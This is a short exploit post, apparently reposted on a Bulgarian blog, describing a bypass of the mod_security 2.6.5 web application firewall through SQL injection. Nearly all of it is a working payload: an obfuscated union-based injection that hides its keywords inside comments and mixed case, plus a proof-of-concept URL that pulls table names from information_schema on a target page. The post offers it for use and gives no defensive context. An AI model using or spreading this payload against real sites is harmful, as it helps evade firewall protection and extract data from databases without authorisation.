# Exploit Title: mod_security 2.6.5 SQL injection bypass.

# Date: 21/04/2012

# Author: Phizo

# Software Link: http://www.modsecurity.org/

# Version: 2.6.5

# Tested on: Windows 7 & Ubuntu 10.04
----------------------------------------------------------------

/** Although I am using union-based injection the concept of the bypass is the same **/


[+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#

[+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
 		 	   		  
Rate this post
Брой прочитания на тази страница: 1298
mod_security 2.6.5 SQLi bypass
Tagged on:

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *